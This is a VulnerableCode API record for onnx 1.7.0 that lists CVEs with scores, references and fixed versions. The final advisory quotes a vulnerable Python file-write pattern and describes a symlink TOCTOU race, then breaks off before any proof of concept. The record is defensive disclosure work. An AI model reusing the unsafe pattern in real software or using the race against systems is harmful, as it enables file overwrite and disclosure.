{"url":"http://public2.vulnerablecode.io/api/packages/31227?format=json","purl":"pkg:pypi/onnx@1.7.0","type":"pypi","namespace":"","name":"onnx","version":"1.7.0","qualifiers":{},"subpath":"","is_vulnerable":true,"next_non_vulnerable_version":"1.21.0","latest_non_vulnerable_version":"1.21.0","affected_by_vulnerabilities":[{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/36733?format=json","vulnerability_id":"VCID-2p7h-ajfk-uugy","summary":"Versions of the package onnx before and including 1.15.0 are vulnerable to Directory Traversal as the external_data field of the tensor proto can have a path to the file which is outside the model current directory or user-provided directory. The vulnerability occurs as a bypass for the patch added for CVE-2022-25882.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-27318","reference_id":"","reference_type":"","scores":[{"value":"0.00408","scoring_system":"epss","scoring_elements":"0.61525","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00408","scoring_system":"epss","scoring_elements":"0.61505","published_at":"2026-06-08T12:55:00Z"},{"value":"0.00408","scoring_system":"epss","scoring_elements":"0.61522","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00408","scoring_system":"epss","scoring_elements":"0.61533","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00408","scoring_system":"epss","scoring_elements":"0.61527","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-27318"},{"reference_url":"https://github.com/onnx/onnx","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/onnx/onnx"},{"reference_url":"https://github.com/onnx/onnx/commit/66b7fb630903fdcf3e83b6b6d56d82e904264a20","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2024-08-14T15:31:21Z/"}],"url":"https://github.com/onnx/onnx/commit/66b7fb630903fdcf3e83b6b6d56d82e904264a20"},{"reference_url":"https://github.com/pypa/advisory-database/tree/main/vulns/onnx/PYSEC-2024-222.yaml","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/pypa/advisory-database/tree/main/vulns/onnx/PYSEC-2024-222.yaml"},{"reference_url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FGTBH5ZYL2LGYHIJDHN2MAUURIR5E7PY","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FGTBH5ZYL2LGYHIJDHN2MAUURIR5E7PY"},{"reference_url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FGTBH5ZYL2LGYHIJDHN2MAUURIR5E7PY/","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2024-08-14T15:31:21Z/"}],"url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FGTBH5ZYL2LGYHIJDHN2MAUURIR5E7PY/"},{"reference_url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TFJJID2IZDOLFDMWVYTBDI75ZJQC6JOL","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TFJJID2IZDOLFDMWVYTBDI75ZJQC6JOL"},{"reference_url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TFJJID2IZDOLFDMWVYTBDI75ZJQC6JOL/","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2024-08-14T15:31:21Z/"}],"url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TFJJID2IZDOLFDMWVYTBDI75ZJQC6JOL/"},{"reference_url":"https://security.snyk.io/vuln/SNYK-PYTHON-ONNX-2395479","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2024-08-14T15:31:21Z/"}],"url":"https://security.snyk.io/vuln/SNYK-PYTHON-ONNX-2395479"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-27318","reference_id":"CVE-2024-27318","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-27318"},{"reference_url":"https://github.com/advisories/GHSA-whh8-fjgc-qp73","reference_id":"GHSA-whh8-fjgc-qp73","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-whh8-fjgc-qp73"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/40185?format=json","purl":"pkg:pypi/onnx@1.16.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-7djm-gpg9-yfgg"},{"vulnerability":"VCID-ctup-6gs9-dkb6"},{"vulnerability":"VCID-ptv3-f9vq-vfcc"},{"vulnerability":"VCID-rs2r-qmck-4qgh"},{"vulnerability":"VCID-seht-766r-kke7"},{"vulnerability":"VCID-u796-p1fa-ubf5"},{"vulnerability":"VCID-vufm-7t73-xfgt"},{"vulnerability":"VCID-zxt4-rysw-hbf3"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/onnx@1.16.0"}],"aliases":["CVE-2024-27318","GHSA-whh8-fjgc-qp73","PYSEC-2024-222"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-2p7h-ajfk-uugy"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/37259?format=json","vulnerability_id":"VCID-7djm-gpg9-yfgg","summary":"Open Neural Network Exchange (ONNX) is an open standard for machine learning interoperability. Prior to version 1.21.0, there is a symlink traversal vulnerability in external data loading allows reading files outside the model directory. This issue has been patched in version 1.21.0.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-34447","reference_id":"","reference_type":"","scores":[{"value":"5e-05","scoring_system":"epss","scoring_elements":"0.00259","published_at":"2026-06-07T12:55:00Z"},{"value":"5e-05","scoring_system":"epss","scoring_elements":"0.0026","published_at":"2026-06-05T12:55:00Z"},{"value":"5e-05","scoring_system":"epss","scoring_elements":"0.00261","published_at":"2026-06-06T12:55:00Z"},{"value":"6e-05","scoring_system":"epss","scoring_elements":"0.00345","published_at":"2026-06-09T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-34447"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34447","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34447"},{"reference_url":"https://github.com/onnx/onnx","reference_id":"","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/onnx/onnx"},{"reference_url":"https://github.com/onnx/onnx/security/advisories/GHSA-p433-9wv8-28xj","reference_id":"","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-01T19:14:28Z/"}],"url":"https://github.com/onnx/onnx/security/advisories/GHSA-p433-9wv8-28xj"},{"reference_url":"https://github.com/pypa/advisory-database/tree/main/vulns/onnx/PYSEC-2026-104.yaml","reference_id":"","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/pypa/advisory-database/tree/main/vulns/onnx/PYSEC-2026-104.yaml"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34447","reference_id":"","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34447"},{"reference_url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1132608","reference_id":"1132608","reference_type":"","scores":[],"url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1132608"},{"reference_url":"https://github.com/advisories/GHSA-p433-9wv8-28xj","reference_id":"GHSA-p433-9wv8-28xj","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-p433-9wv8-28xj"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/49109?format=json","purl":"pkg:pypi/onnx@1.21.0","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/onnx@1.21.0"}],"aliases":["CVE-2026-34447","GHSA-p433-9wv8-28xj","PYSEC-2026-104"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-7djm-gpg9-yfgg"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/63877?format=json","vulnerability_id":"VCID-ctup-6gs9-dkb6","summary":"ONNX: ONNX: Denial of Service and potential information disclosure via malicious model metadata","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-34445.json","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:H"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-34445.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-34445","reference_id":"","reference_type":"","scores":[{"value":"0.00178","scoring_system":"epss","scoring_elements":"0.39136","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00178","scoring_system":"epss","scoring_elements":"0.39124","published_at":"2026-06-08T12:55:00Z"},{"value":"0.00207","scoring_system":"epss","scoring_elements":"0.43158","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00207","scoring_system":"epss","scoring_elements":"0.43136","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00207","scoring_system":"epss","scoring_elements":"0.4315","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-34445"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34445","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34445"},{"reference_url":"https://github.com/onnx/onnx","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/onnx/onnx"},{"reference_url":"https://github.com/onnx/onnx/commit/e30c6935d67cc3eca2fa284e37248e7c0036c46b","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-01T17:59:29Z/"}],"url":"https://github.com/onnx/onnx/commit/e30c6935d67cc3eca2fa284e37248e7c0036c46b"},{"reference_url":"https://github.com/onnx/onnx/pull/7751","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-01T17:59:29Z/"}],"url":"https://github.com/onnx/onnx/pull/7751"},{"reference_url":"https://github.com/onnx/onnx/security/advisories/GHSA-538c-55jv-c5g9","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-01T17:59:29Z/"}],"url":"https://github.com/onnx/onnx/security/advisories/GHSA-538c-55jv-c5g9"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34445","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34445"},{"reference_url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1132606","reference_id":"1132606","reference_type":"","scores":[],"url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1132606"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2453930","reference_id":"2453930","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2453930"},{"reference_url":"https://github.com/advisories/GHSA-538c-55jv-c5g9","reference_id":"GHSA-538c-55jv-c5g9","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-538c-55jv-c5g9"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/49109?format=json","purl":"pkg:pypi/onnx@1.21.0","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/onnx@1.21.0"}],"aliases":["CVE-2026-34445","GHSA-538c-55jv-c5g9"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ctup-6gs9-dkb6"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/36732?format=json","vulnerability_id":"VCID-mz2c-nefk-8ffx","summary":"Versions of the package onnx before and including 1.15.0 are vulnerable to Out-of-bounds Read as the ONNX_ASSERT and ONNX_ASSERTM functions have an off by one string copy.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-27319","reference_id":"","reference_type":"","scores":[{"value":"0.00086","scoring_system":"epss","scoring_elements":"0.24885","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00086","scoring_system":"epss","scoring_elements":"0.24766","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00086","scoring_system":"epss","scoring_elements":"0.24759","published_at":"2026-06-08T12:55:00Z"},{"value":"0.00086","scoring_system":"epss","scoring_elements":"0.24816","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00086","scoring_system":"epss","scoring_elements":"0.24875","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-27319"},{"reference_url":"https://github.com/onnx/onnx","reference_id":"","reference_type":"","scores":[{"value":"4.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/onnx/onnx"},{"reference_url":"https://github.com/onnx/onnx/commit/08a399ba75a805b7813ab8936b91d0e274b08287","reference_id":"","reference_type":"","scores":[{"value":"4.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:L"},{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-02-23T22:35:11Z/"}],"url":"https://github.com/onnx/onnx/commit/08a399ba75a805b7813ab8936b91d0e274b08287"},{"reference_url":"https://github.com/pypa/advisory-database/tree/main/vulns/onnx/PYSEC-2024-223.yaml","reference_id":"","reference_type":"","scores":[{"value":"4.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/pypa/advisory-database/tree/main/vulns/onnx/PYSEC-2024-223.yaml"},{"reference_url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FGTBH5ZYL2LGYHIJDHN2MAUURIR5E7PY","reference_id":"","reference_type":"","scores":[{"value":"4.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FGTBH5ZYL2LGYHIJDHN2MAUURIR5E7PY"},{"reference_url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FGTBH5ZYL2LGYHIJDHN2MAUURIR5E7PY/","reference_id":"","reference_type":"","scores":[{"value":"4.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:L"},{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-02-23T22:35:11Z/"}],"url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FGTBH5ZYL2LGYHIJDHN2MAUURIR5E7PY/"},{"reference_url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TFJJID2IZDOLFDMWVYTBDI75ZJQC6JOL","reference_id":"","reference_type":"","scores":[{"value":"4.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TFJJID2IZDOLFDMWVYTBDI75ZJQC6JOL"},{"reference_url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TFJJID2IZDOLFDMWVYTBDI75ZJQC6JOL/","reference_id":"","reference_type":"","scores":[{"value":"4.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:L"},{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-02-23T22:35:11Z/"}],"url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TFJJID2IZDOLFDMWVYTBDI75ZJQC6JOL/"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-27319","reference_id":"CVE-2024-27319","reference_type":"","scores":[{"value":"4.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-27319"},{"reference_url":"https://github.com/advisories/GHSA-h8wv-9h96-m4hr","reference_id":"GHSA-h8wv-9h96-m4hr","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-h8wv-9h96-m4hr"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/40185?format=json","purl":"pkg:pypi/onnx@1.16.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-7djm-gpg9-yfgg"},{"vulnerability":"VCID-ctup-6gs9-dkb6"},{"vulnerability":"VCID-ptv3-f9vq-vfcc"},{"vulnerability":"VCID-rs2r-qmck-4qgh"},{"vulnerability":"VCID-seht-766r-kke7"},{"vulnerability":"VCID-u796-p1fa-ubf5"},{"vulnerability":"VCID-vufm-7t73-xfgt"},{"vulnerability":"VCID-zxt4-rysw-hbf3"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/onnx@1.16.0"}],"aliases":["CVE-2024-27319","GHSA-h8wv-9h96-m4hr","PYSEC-2024-223"],"risk_score":4.1,"exploitability":"0.5","weighted_severity":"8.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-mz2c-nefk-8ffx"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/63875?format=json","vulnerability_id":"VCID-ptv3-f9vq-vfcc","summary":"onnx: ONNX: Information disclosure through hardlink path traversal","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-34446.json","reference_id":"","reference_type":"","scores":[{"value":"4.7","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-34446.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-34446","reference_id":"","reference_type":"","scores":[{"value":"4e-05","scoring_system":"epss","scoring_elements":"0.00198","published_at":"2026-06-09T12:55:00Z"},{"value":"4e-05","scoring_system":"epss","scoring_elements":"0.00164","published_at":"2026-06-06T12:55:00Z"},{"value":"4e-05","scoring_system":"epss","scoring_elements":"0.00163","published_at":"2026-06-07T12:55:00Z"},{"value":"4e-05","scoring_system":"epss","scoring_elements":"0.00199","published_at":"2026-06-08T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-34446"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34446","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34446"},{"reference_url":"https://github.com/onnx/onnx","reference_id":"","reference_type":"","scores":[{"value":"4.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/onnx/onnx"},{"reference_url":"https://github.com/onnx/onnx/commit/4755f8053928dce18a61db8fec71b69c74f786cb","reference_id":"","reference_type":"","scores":[{"value":"4.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-02T14:10:29Z/"}],"url":"https://github.com/onnx/onnx/commit/4755f8053928dce18a61db8fec71b69c74f786cb"},{"reference_url":"https://github.com/onnx/onnx/security/advisories/GHSA-cmw6-hcpp-c6jp","reference_id":"","reference_type":"","scores":[{"value":"4.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-02T14:10:29Z/"}],"url":"https://github.com/onnx/onnx/security/advisories/GHSA-cmw6-hcpp-c6jp"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34446","reference_id":"","reference_type":"","scores":[{"value":"4.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34446"},{"reference_url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1132607","reference_id":"1132607","reference_type":"","scores":[],"url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1132607"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2454371","reference_id":"2454371","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2454371"},{"reference_url":"https://github.com/advisories/GHSA-cmw6-hcpp-c6jp","reference_id":"GHSA-cmw6-hcpp-c6jp","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-cmw6-hcpp-c6jp"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/49109?format=json","purl":"pkg:pypi/onnx@1.21.0","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/onnx@1.21.0"}],"aliases":["CVE-2026-34446","GHSA-cmw6-hcpp-c6jp"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ptv3-f9vq-vfcc"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90052?format=json","vulnerability_id":"VCID-rs2r-qmck-4qgh","summary":"ONNX: TOCTOU arbitrary file read/write in save_external_dat\n### Summary\n\nThe `save_external_data` method seems to include multiple issues introducing a local TOCTOU vulnerability, an arbitrary file read/write on any system. It potentially includes a path validation bypass on Windows systems.\nRegarding the TOCTOU, an attacker seems to be able to overwrite victim's files via symlink following under the same privilege scope.\nThe mentioned function can be found here: https://github.com/onnx/onnx/blob/main/onnx/external_data_helper.py#L188\n\n### Details\n\n#### TOCTOU\nThe vulnerable code pattern:\n```python\n   # CHECK - Is this a file?\n   if not os.path.isfile(external_data_file_path):\n       # Line 228-229: USE #1 - Create if it doesn't exist\n       with open(external_data_file_path, \"ab\"):\n           pass\n   \n   # Open for writing\n   with open(external_data_file_path, \"r+b\") as data_file:\n       # Lines 233-243: Write tensor data\n       data_file.seek(0, 2)\n       if info.offset is not None:\n           file_size = data_file.tell()\n           if info.offset > file_size:\n               data_file.write(b\"\\0\" * (info.offset - file_size))\n           data_file.seek(info.offset)\n       offset = data_file.tell()\n       data_file.write(tensor.raw_data)\n```\nThere is a time gap between `os.path.isfile` and `open` with no atomic file creation flags (e.g. `O_EXCEL | O_CREAT`) allowing the attacker to create a symlink that is being followed (absence of `O_NOFOLLOW`), between these two calls. By combining these, the attack is possible as shown below in the PoC section.\n\n#### Bypass\nThere is also a potential validation bypass on Windows systems in the same method 